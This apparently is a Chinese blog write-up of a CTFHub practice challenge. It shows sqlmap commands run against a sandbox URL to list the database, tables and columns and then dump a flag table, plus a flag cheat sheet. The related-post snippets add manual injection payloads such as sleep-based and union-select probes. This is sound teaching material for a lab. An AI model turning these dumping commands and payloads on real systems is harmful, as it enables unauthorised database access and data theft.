CTFHub Web sql注入2(sqlmap)

最新推荐文章于 2025-05-23 22:11:56 发布
最新推荐文章于 2025-05-23 22:11:56 发布
阅读量402 收藏 2
点赞数 5
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2406_87429010/article/details/145190634
版权

时间盲注

若要是使用手动的时间盲注,很麻烦。

我们使用工具sqlmap

第一步,判断数据库名称
>python sqlmap.py -u http://challenge-04a2f565db4fc01b.sandbox.ctfhub.com:10800/?id=1 --dbs --batch

我们得知数据库名为sqli

第二步,判断库中表名

python sqlmap.py -u http://challenge-04a2f565db4fc01b.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --batch

我们查看到有一个表名为flag和news

第三步,判断表中字段

python sqlmap.py -u http://challenge-04a2f565db4fc01b.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns --batch
第四步,查看flag字段的具体内容

 

python sqlmap.py -u http://challenge-04a2f565db4fc01b.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump-all --batch

如此,我们就知道了flag

MYSQL数据库

我们也使用sqlmap工具,步骤和上面差不多,就是表名和字段名不一样

 sqlmap的使用方法

python sqlmap.py -u "目标url" --batch 
-batch:sqlmap帮你判断选择yes或no

-dbs:查看数据库

-tables:查看表名

-columns:查看字段名

-dump:查看字段中的具体内容

-dump-all:查看字段中所有内容

注意:我们在使用前要先判断是字符型注入还是数字型注入。

&宋你一亚
关注
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5749
Ctfhub解题 web SQL注入
CTFHub (web-SQL-布尔盲注sqlmap)
m0_64444909的博客
05-09 898
一、关于sqlmap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语
CTFHub~SQL注入超简单详细教程
weixin_67832625的博客
08-14 2317
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问题,随时联系作者
CTFHub-sql注入
qq_60905276的博客
01-30 5872
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
CTFHUBsql注入(特详解)
小宇的web博客
06-16 3098
CTFHUBsql注入 1.整数型注入 1.这里我使用的是Hackbar来进行sql注入,首先先判断有没有注入漏洞 加单引号 去掉‘加上and 1=1发现出现了回显 将1=1变为1=2,语句正确但是无法访问数据库 这里可以判定这里存在数字注入漏洞 2.接下来判断字段数量 这里输入id=1 order by 2看是否字段数量是否是2个 3.查询SQL语句插入位置 这里使用联合查询,查询库名。可以在data库中插入sql语句,也就是2的位置 4.获取数据库库名 1)获取当前数据库库名,数据库的名称为
CTFHub 整数型SQL注入
Leon~博客
03-08 5809
1、整数型SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
CTFHUB|SQL注入sqlmap
m0_60651303的博客
07-14 1371
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHub-Web-SQL注入
IceCream的博客
04-30 1454
1.题目说输入1,先将1输入查看结果2.接着输入4-1,发现输出的结果为4-1,判定存在整数型注入3.查询字段数,出现了回显,判断这里的字段数为24.判断注入点在2的位置,也就是data5.查询数据库名,得知为sqli6.查询该库下的表名,得知为news、flag7.查询flag表下的字段8.发现了flag字段,去查询flag字段的内容,最终得到flag。
CTFHub——技能树——SQL注入sqlmap
sparename的博客
12-26 7690
SQL注入整数型注入sqlmap简介检测注入实战解题字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
ctfhub web SQL注入 wp
m0_55854679的博客
07-25 475
数字型注入 方法1 打开题目链接,题目提示为数字型注入,尝试输入1 使用order by查询字段数为2 id=-1 union select 1,2# 查看回显位置 4. id=-1 union select 1,database()# 获得数据库名 5. 查询数据库中的表名 -1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli' 6.查询flag列中的
关于ctfhub中cookie注入方法之sqlmap自动注入
m0_62819604的博客
10-23 804
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库sqli 然后查询数据库sqlmap -u "http://challenge-593b57751..
ctfhub——web——sql注入(sqlmap实现)
weixin_43906500的博客
05-13 1839
本次sql注入全部基于sqlmap实现 1.整数型注入 题目如下,为整数型注入 1.1安装sqlmap sudo apt install sqlmap 1.2测试注入 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.com:10080/?id=1 成功注入 1.3查看数据库 执行命令 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 950
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
SQL 数值计算全解析:ABS、CEIL、FLOOR与ROUND函数深度精讲
Musennn的博客
05-21 701
ABS函数:获取绝对值,处理负数场景CEIL与FLOOR函数:掌握向上/向下取整的方向逻辑ROUND函数:精确控制小数位数,注意进位规则NULL值处理:使用COALESCE函数增强健壮性。
SQL SERVER表中,找出一行数据的多列中的最大值
luckyext的博客
05-23 183
SQL SERVER表中,找出一行数据的多列中的最大值。使用values子句创建临时的数据集,将每行数据构造为只有一个字段的表,再求最大值。
业务场景中使用 SQL 实现快速数据更新与插入
最新发布
ALex_zry的博客
05-23 228
本文介绍了气象数据处理系统中分钟级降水数据的更新和插入实现方法。通过INSERT INTO ... ON DUPLICATE KEY UPDATE语法,可以自动检测并处理数据冲突,实现存在则更新、不存在则插入的功能。文章详细说明了SQL语句构造和C++代码实现步骤,包括数据表结构、动态SQL生成和数据库操作。同时提供了使用注意事项,如性能优化、错误处理和安全性考虑,帮助开发者高效准确地处理气象数据。该方法适用于需要定期更新时间序列数据的应用场景。
Postgresql 数据库体系架构
zyb378747350的专栏
05-23 295
软件目录,数据库目录结构,进程结构
PL/SQL 安装配置与使用
是萝卜干呀的博客
05-20 902
PL/SQL 的安装配置、基础设置和使用;包和包体、存储过程的使用;存储过程的断点调试
SQL 多表关联与分组聚合:解密答题正确率分析
Musennn的博客
05-21 1027
题目要求:计算浙江大学用户在不同难度题目下的答题正确率,并按正确率升序排序。关键分析点:假设各表结构及部分数据:user_profile:question_practice_detail:question_detail:预期结果: 2.2 关键技术点分解 1. 三表关联策略 作用: 通过关联用户与答题记录 通过关联答题记录与题目难度 选择内连接的原因: 仅统计实际答题的用户和题目 排除未答题用户或无难度信息的题目 2. 正确率计算逻辑 分子:统计正确答题数 分母:统计总答题数 ROUN
青少年CTF挑战:SQL注入解题攻略与sqlmap使用
"青少年CTF平台的sql-labs 1-10关的解题方法,包含多种解决方案,包括使用sqlmap和Python脚本,适用于学习sql注入web安全。" 在sql-labs的前五关中,我们主要涉及到的是SQL注入SQL Injection)的基本技巧和策略...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值